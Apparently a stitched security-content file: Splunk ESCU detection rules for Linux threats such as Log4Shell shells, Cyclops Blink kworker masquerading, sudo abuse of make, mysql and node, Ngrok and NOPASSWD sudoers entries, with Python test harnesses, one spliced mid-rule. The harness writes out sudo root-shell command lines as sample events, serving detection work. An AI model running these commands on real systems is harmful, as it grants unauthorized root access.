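    # whole string goes through a shell, so the event is the sh -c wrapper.
    cmd = f"iptables -I INPUT -p tcp --dport {port} -j ACCEPT &>/dev/null"
    return ProcessEvent("fw-edge1", user, parent_name, ppid, parent_path,
                        "sh", "/bin/sh", f'sh -c "{cmd}"')


SAMPLE_EVENTS = [
    # A parent masquerading as a kernel thread and running out of /tmp:
    # the Cyclops Blink pattern the rule is built for.
    *(_sh_event("root", "[kworker/0:1]", 4242, "/tmp/.cache/kworker", p)
      for p in (636, 989, 8443)),
    # Same parent, but 22 is not in the rex list, so it adds nothing.
    _sh_event("root", "[kworker/0:1]", 4242, "/tmp/.cache/kworker", 22),
    # An operator's bash under /usr/bin is excluded by parent_process_path.
    *(_sh_event("ops", "bash", 1717, "/usr/bin/bash", p)
      for p in (636, 989, 8443)),
]

if __name__ == "__main__":
    for actor, ports in alerts(SAMPLE_EVENTS).items():
        print("ALERT", actor[0], actor[1], actor[4], ports)
```

Only the `/tmp/.cache/kworker` parent reaches three distinct ports; the operator opens the same three ports but is dropped by the parent-path exclusion, and the port 22 event passes the where-clause yet contributes nothing to the count.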
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering may be required on internal developer build systems; alternatively, classify assets as web facing and restrict the analytic based on asset type. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Java Spawning Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Spring4Shell CVE-2022-22965", "Hermetic Wiper", "Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ spawning a Linux shell, potentially indicative of exploitation. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Java Spawning Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Spring4Shell CVE-2022-22965", "Hermetic Wiper", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. 
This is potentially indicative of exploitation of the Java application and may be related to CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. action.notable.param.rule_title = Linux Java Spawning Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=java OR Processes.parent_process_name=apache OR Processes.parent_process_name=tomcat) `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_java_spawning_shell_filter` [ESCU - Linux Kernel Module Enumeration - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process kmod being utilized to list kernel modules in use. Typically, this is not seen as malicious; however, it may be a precursor to the use of insmod to install a module. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082", "T1014"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process kmod being utilized to list kernel modules in use. Typically, this is not seen as malicious; however, it may be a precursor to the use of insmod to install a module. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Kernel Module Enumeration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ enumeration kernel modules. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Kernel Module Enumeration - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082", "T1014"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=kmod Processes.process IN ("*lsmod*", "*list*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_kernel_module_enumeration_filter` [ESCU - Linux Kworker Process In Writable Process Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for a suspicious kworker process command line on a Linux machine. kworker is the common name of the kernel worker threads on Linux. This hunting detection surfaces processes whose parent process path is in a writable directory such as /home/, /var/log/ or /tmp/. This technique was seen in the Cyclops Blink malware, which disguises its core and child processes as normal kworker threads on the compromised machine. This detection can be a good pivot to look for other IOCs related to Cyclops Blink malware or attacks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.004", "T1036"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for a suspicious kworker process command line on a Linux machine. kworker is the common name of the kernel worker threads on Linux. This hunting detection surfaces processes whose parent process path is in a writable directory such as /home/, /var/log/ or /tmp/. This technique was seen in the Cyclops Blink malware, which disguises its core and child processes as normal kworker threads on the compromised machine. This detection can be a good pivot to look for other IOCs related to Cyclops Blink malware or attacks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-12 action.escu.modification_date = 2023-04-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Kworker Process In Writable Process Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sandworm Tools", "Cyclops Blink"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Kworker Process In Writable Process Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "Cyclops Blink"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.004", "T1036"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process = "*[kworker/*" Processes.parent_process_path IN ("/home/*", "/tmp/*", "/var/log/*") Processes.process="*iptables*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_path Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_kworker_process_in_writable_process_path_filter` [ESCU - Linux Make Privilege Escalation - Rule] action.escu = 
0 action.escu.enabled = 1 description = The Linux make command is used to build and maintain groups of programs and files from the source code. In Linux, it is one of the most frequently used commands by the developers. It assists developers to install and compile many utilities from the terminal. If sudo right is given to make utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The Linux make command is used to build and maintain groups of programs and files from the source code. In Linux, it is one of the most frequently used commands by the developers. It assists developers to install and compile many utilities from the terminal. If sudo right is given to make utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. 
action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Make Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Make Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*make*-s*" AND Processes.process="*--eval*" AND Processes.process="*sudo*" by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_make_privilege_escalation_filter` [ESCU - Linux MySQL Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = MySQL is an open-source relational database management system. Its name is a combination of "My", the name of co-founder Michael Widenius's daughter My, and "SQL", the abbreviation for Structured Query Language. If sudo right is given to mysql utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = MySQL is an open-source relational database management system. Its name is a combination of "My", the name of co-founder Michael Widenius's daughter My, and "SQL", the abbreviation for Structured Query Language. If sudo right is given to mysql utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux MySQL Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux MySQL Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats 
`security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*mysql*-e*" AND Processes.process="*\!**" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_mysql_privilege_escalation_filter` [ESCU - Linux Ngrok Reverse Proxy Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Ngrok being utilized on the Linux operating system. Unfortunately, there is no original file name for Ngrok, so it may be worth an additional hunt to identify any command-line arguments. The sign of someone using Ngrok is not malicious, however, more recently it has become an adversary tool. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1572", "T1090", "T1102"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Ngrok being utilized on the Linux operating system. Unfortunately, there is no original file name for Ngrok, so it may be worth an additional hunt to identify any command-line arguments. The sign of someone using Ngrok is not malicious, however, more recently it has become an adversary tool. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
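The make and mysql privilege-escalation rules above both describe the same situation: a user holding a sudo right on a build or database tool turns it into a root shell, and the searches key on the command-line terms that invocation needs (`make -s --eval`, `mysql -e '\! ...'`, plus `sudo`). The following is an added Python example, not ESCU code, that runs both rules' wildcard terms over constructed events. It assumes Splunk's case-insensitive value matching, reads the mysql rule's escaped `*\!**` term as "contains a literal `\!`" (the mysql client's shell-escape command), and uses invented hosts and users. It also records one detail the rules rely on: sudo forks and execs the target, so the child's own command line no longer contains the word `sudo`; the `*sudo*` term therefore matches the sudo process's event, not the make or mysql one.

```python
import fnmatch
from dataclasses import dataclass


# Constructed stand-in for the Endpoint.Processes fields the rules use.
@dataclass(frozen=True)
class ProcessEvent:
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    process: str  # full command line


# The wildcard terms each rule ANDs together over Processes.process.
# The mysql rule's "*\!**" is read here as "contains a literal \!"
# (the mysql client's shell-escape command); that reading is an assumption.
RULES = {
    "Linux Make Privilege Escalation": ("*make*-s*", "*--eval*", "*sudo*"),
    "Linux MySQL Privilege Escalation": ("*mysql*-e*", "*\\!*", "*sudo*"),
}


def spl_match(pattern: str, text: str) -> bool:
    """Splunk '*' wildcard match; lower-cased on both sides to mimic
    Splunk's case-insensitive field-value matching (assumption)."""
    return fnmatch.fnmatchcase(text.lower(), pattern.lower())


def matching_rules(ev: ProcessEvent):
    """Names of the rules whose every term matches this command line."""
    return [name for name, terms in RULES.items()
            if all(spl_match(t, ev.process) for t in terms)]


def run(events):
    """(rule, dest, user, process_name) for each event a rule would emit."""
    return [(rule, ev.dest, ev.user, ev.process_name)
            for ev in events for rule in matching_rules(ev)]


# Constructed sample events (hosts and users invented).  The two sudo lines
# are the shapes the rules' patterns correspond to, written as an agent
# would record the command line, not as typed at a shell prompt.
SAMPLE_EVENTS = [
    # The sudo process: its command line carries "sudo", so the rule fires here...
    ProcessEvent("build01", "dev", "bash", "sudo",
                 "sudo make -s --eval=$'x:\\n\\t-'/bin/sh"),
    # ...but the make it execs has no "sudo" in its own command line.
    ProcessEvent("build01", "root", "sudo", "make",
                 "make -s --eval=$'x:\\n\\t-'/bin/sh"),
    ProcessEvent("db03", "dba", "bash", "sudo", "sudo mysql -e '\\! /bin/sh'"),
    # Benign sudo use of both tools.
    ProcessEvent("build01", "dev", "bash", "sudo", "sudo make -s install"),
    ProcessEvent("db03", "dba", "bash", "sudo", "sudo mysql -e 'SELECT 1'"),
    # The same make trick without -s: the "*make*-s*" term misses it,
    # although -s only silences make's output and is not needed for the technique.
    ProcessEvent("build01", "dev", "bash", "sudo",
                 "sudo make --eval=$'x:\\n\\t-'/bin/sh"),
]

if __name__ == "__main__":
    for hit in run(SAMPLE_EVENTS):
        print("ALERT", *hit)
```

Two of the six events alert, both on the `sudo` process. The last event is the practical caveat: `-s` is optional for the technique, so a rule that requires it can be sidestepped by dropping the flag; the `--eval` and `sudo` terms are the ones carrying the signal.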
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if Ngrok is an authorized utility. Filter as needed. action.escu.creation_date = 2023-01-12 action.escu.modification_date = 2023-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ngrok Reverse Proxy Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Reverse Network Proxy"] action.risk = 1 action.risk.param._risk_message = A reverse proxy was identified spawning from $parent_process_name$ - $process_name$ on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ngrok Reverse Proxy Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Reverse Network Proxy"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1572", "T1090", "T1102"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ngrok Processes.process IN ("*start*", "*--config*","*http*","*authtoken*", "*http*", "*tcp*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ngrok_reverse_proxy_usage_filter` [ESCU - Linux Node Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Node.js is a back-end JavaScript runtime environment that is open-source, cross-platform, runs on the V8 engine, and executes JavaScript code outside of a web browser. 
It was created to help create scalable network applications. If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Node.js is a back-end JavaScript runtime environment that is open-source, cross-platform, runs on the V8 engine, and executes JavaScript code outside of a web browser. It was created to help create scalable network applications. If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. 
action.escu.creation_date = 2022-07-31 action.escu.modification_date = 2022-07-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Node Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Node Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sudo*node*" AND Processes.process="*-e*" AND Processes.process="*child_process.spawn*" AND 
Processes.process="*stdio*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_node_privilege_escalation_filter` [ESCU - Linux NOPASSWD Entry In Sudoers File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for suspicious command lines that may add entry to /etc/sudoers with NOPASSWD attribute in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain elevated privilege to the targeted or compromised host. /etc/sudoers file controls who can run what commands users can execute on the machines and can also control whether user need a password to execute particular commands. This file is composed of aliases (basically variables) and user specifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for suspicious command lines that may add entry to /etc/sudoers with NOPASSWD attribute in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain elevated privilege to the targeted or compromised host. /etc/sudoers file controls who can run what commands users can execute on the machines and can also control whether user need a password to execute particular commands. This file is composed of aliases (basically variables) and user specifications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux NOPASSWD Entry In Sudoers File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux NOPASSWD Entry In Sudoers File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 
